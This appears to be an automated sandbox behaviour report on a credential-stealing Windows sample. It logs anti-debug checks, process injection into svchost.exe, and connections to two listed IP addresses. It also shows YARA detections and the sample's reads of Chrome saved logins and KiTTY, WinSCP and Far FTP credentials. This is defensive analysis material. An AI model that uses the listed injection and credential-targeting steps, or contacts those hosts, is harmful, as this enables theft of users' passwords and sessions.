                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00054CE8 mov eax, dword ptr fs:[00000030h]2_2_00054CE8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00F02FA0 mov eax, dword ptr fs:[00000030h]2_2_00F02FA0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00F02F40 mov eax, dword ptr fs:[00000030h]2_2_00F02F40
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00F018F0 mov eax, dword ptr fs:[00000030h]2_2_00F018F0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 9_2_00F01BF0 mov eax, dword ptr fs:[00000030h]9_2_00F01BF0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 9_2_00F01B90 mov eax, dword ptr fs:[00000030h]9_2_00F01B90
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 9_2_00F00540 mov eax, dword ptr fs:[00000030h]9_2_00F00540
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 11_2_010D9700 mov eax, dword ptr fs:[00000030h]11_2_010D9700
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 11_2_010DADB0 mov eax, dword ptr fs:[00000030h]11_2_010DADB0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 11_2_010DAD50 mov eax, dword ptr fs:[00000030h]11_2_010DAD50
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 12_2_00F32BD0 mov eax, dword ptr fs:[00000030h]12_2_00F32BD0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 12_2_00F34220 mov eax, dword ptr fs:[00000030h]12_2_00F34220
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 12_2_00F34280 mov eax, dword ptr fs:[00000030h]12_2_00F34280
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 14_2_00EB8B60 mov eax, dword ptr fs:[00000030h]14_2_00EB8B60
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 14_2_00EB74B0 mov eax, dword ptr fs:[00000030h]14_2_00EB74B0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 14_2_00EB8B00 mov eax, dword ptr fs:[00000030h]14_2_00EB8B00
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_01533948 mov eax, dword ptr fs:[00000030h]15_2_01533948
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_014D257B mov eax, dword ptr fs:[00000030h]15_2_014D257B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_015338E8 mov eax, dword ptr fs:[00000030h]15_2_015338E8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_01532298 mov eax, dword ptr fs:[00000030h]15_2_01532298
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 16_2_01642660 mov eax, dword ptr fs:[00000030h]16_2_01642660
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 16_2_01642600 mov eax, dword ptr fs:[00000030h]16_2_01642600
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 16_2_01640FB0 mov eax, dword ptr fs:[00000030h]16_2_01640FB0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 17_2_00F02368 mov eax, dword ptr fs:[00000030h]17_2_00F02368
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 17_2_00F039B8 mov eax, dword ptr fs:[00000030h]17_2_00F039B8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 17_2_00F03A18 mov eax, dword ptr fs:[00000030h]17_2_00F03A18
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00FA2870 mov eax, dword ptr fs:[00000030h]18_2_00FA2870
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00FA2810 mov eax, dword ptr fs:[00000030h]18_2_00FA2810
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00FA11C0 mov eax, dword ptr fs:[00000030h]18_2_00FA11C0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00F2257B mov eax, dword ptr fs:[00000030h]18_2_00F2257B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 19_2_01572B40 mov eax, dword ptr fs:[00000030h]19_2_01572B40
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 19_2_015741F0 mov eax, dword ptr fs:[00000030h]19_2_015741F0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 19_2_01574190 mov eax, dword ptr fs:[00000030h]19_2_01574190
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 20_2_01434CC0 mov eax, dword ptr fs:[00000030h]20_2_01434CC0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 20_2_01434C60 mov eax, dword ptr fs:[00000030h]20_2_01434C60
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 20_2_01433610 mov eax, dword ptr fs:[00000030h]20_2_01433610
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 21_2_01302298 mov eax, dword ptr fs:[00000030h]21_2_01302298
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 21_2_013038E8 mov eax, dword ptr fs:[00000030h]21_2_013038E8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 21_2_01303948 mov eax, dword ptr fs:[00000030h]21_2_01303948
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 22_2_015FDDC8 mov eax, dword ptr fs:[00000030h]22_2_015FDDC8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 22_2_015FDD68 mov eax, dword ptr fs:[00000030h]22_2_015FDD68
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 22_2_015FC718 mov eax, dword ptr fs:[00000030h]22_2_015FC718
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_0144257B mov eax, dword ptr fs:[00000030h]23_2_0144257B
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_014B3BF8 mov eax, dword ptr fs:[00000030h]23_2_014B3BF8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_014B5248 mov eax, dword ptr fs:[00000030h]23_2_014B5248
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 23_2_014B52A8 mov eax, dword ptr fs:[00000030h]23_2_014B52A8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 24_2_012D3D30 mov eax, dword ptr fs:[00000030h]24_2_012D3D30
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 24_2_012D3D90 mov eax, dword ptr fs:[00000030h]24_2_012D3D90
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 24_2_012D26E0 mov eax, dword ptr fs:[00000030h]24_2_012D26E0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 25_2_01324218 mov eax, dword ptr fs:[00000030h]25_2_01324218
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 25_2_01324278 mov eax, dword ptr fs:[00000030h]25_2_01324278
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 25_2_01322BC8 mov eax, dword ptr fs:[00000030h]25_2_01322BC8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 26_2_01603258 mov eax, dword ptr fs:[00000030h]26_2_01603258
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 26_2_016048A8 mov eax, dword ptr fs:[00000030h]26_2_016048A8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 26_2_01604908 mov eax, dword ptr fs:[00000030h]26_2_01604908
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 27_2_017B3CF8 mov eax, dword ptr fs:[00000030h]27_2_017B3CF8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 27_2_017B2648 mov eax, dword ptr fs:[00000030h]27_2_017B2648
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 27_2_017B3C98 mov eax, dword ptr fs:[00000030h]27_2_017B3C98
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 28_2_00D73240 mov eax, dword ptr fs:[00000030h]28_2_00D73240
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 28_2_00D71BF0 mov eax, dword ptr fs:[00000030h]28_2_00D71BF0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 28_2_00D732A0 mov eax, dword ptr fs:[00000030h]28_2_00D732A0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 29_2_01D4DD50 mov eax, dword ptr fs:[00000030h]29_2_01D4DD50
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 29_2_01D4C700 mov eax, dword ptr fs:[00000030h]29_2_01D4C700
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 29_2_01D4DDB0 mov eax, dword ptr fs:[00000030h]29_2_01D4DDB0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 30_2_01577BC8 mov eax, dword ptr fs:[00000030h]30_2_01577BC8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 30_2_01577B68 mov eax, dword ptr fs:[00000030h]30_2_01577B68
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 30_2_01576518 mov eax, dword ptr fs:[00000030h]30_2_01576518
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 31_2_00DA3DD8 mov eax, dword ptr fs:[00000030h]31_2_00DA3DD8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 31_2_00DA2788 mov eax, dword ptr fs:[00000030h]31_2_00DA2788
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 31_2_00DA3E38 mov eax, dword ptr fs:[00000030h]31_2_00DA3E38
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 32_2_01344190 mov eax, dword ptr fs:[00000030h]32_2_01344190
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 32_2_013441F0 mov eax, dword ptr fs:[00000030h]32_2_013441F0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 32_2_01342B40 mov eax, dword ptr fs:[00000030h]32_2_01342B40
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 33_2_01813D90 mov eax, dword ptr fs:[00000030h]33_2_01813D90
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 33_2_01813D30 mov eax, dword ptr fs:[00000030h]33_2_01813D30
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 33_2_018126E0 mov eax, dword ptr fs:[00000030h]33_2_018126E0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 34_2_00C92DD8 mov eax, dword ptr fs:[00000030h]34_2_00C92DD8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 34_2_00C94488 mov eax, dword ptr fs:[00000030h]34_2_00C94488
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 34_2_00C94428 mov eax, dword ptr fs:[00000030h]34_2_00C94428
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 35_2_01412B48 mov eax, dword ptr fs:[00000030h]35_2_01412B48
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 35_2_014141F8 mov eax, dword ptr fs:[00000030h]35_2_014141F8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 35_2_01414198 mov eax, dword ptr fs:[00000030h]35_2_01414198
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 36_2_017B32E0 mov eax, dword ptr fs:[00000030h]36_2_017B32E0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 36_2_017B4930 mov eax, dword ptr fs:[00000030h]36_2_017B4930
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 36_2_017B4990 mov eax, dword ptr fs:[00000030h]36_2_017B4990
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 37_2_00945310 mov eax, dword ptr fs:[00000030h]37_2_00945310
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 37_2_00943CC0 mov eax, dword ptr fs:[00000030h]37_2_00943CC0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 37_2_00945370 mov eax, dword ptr fs:[00000030h]37_2_00945370
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00770B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00770B62
                Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00742622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00742622
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0073083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0073083F
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007309D5 SetUnhandledExceptionFilter,0_2_007309D5
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00730C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00730C21
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00062622
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0005083F
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000509D5 SetUnhandledExceptionFilter,2_2_000509D5
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00050C21
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.245.123.11 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.15.112.248 443Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeMemory written: C:\Users\user\AppData\Roaming\Dhy2kmz.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 859008Jump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00771201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00771201
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00752BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00752BA5
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0077B226 SendInput,keybd_event,0_2_0077B226
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_007922DA
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe" Jump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00770B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00770B62
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00771663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00771663
                Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmp, 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 9876567899.bat.exe, palladiums.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00730698 cpuid 0_2_00730698
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeQueries volume information: C:\Users\user\AppData\Roaming\Dhy2kmz.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeQueries volume information: C:\Users\user\AppData\Roaming\Dhy2kmz.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_00788195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00788195
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0076D27A GetUserNameW,0_2_0076D27A
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0074B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0074B952
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007142DE
                Source: C:\Users\user\Desktop\9876567899.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6784, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
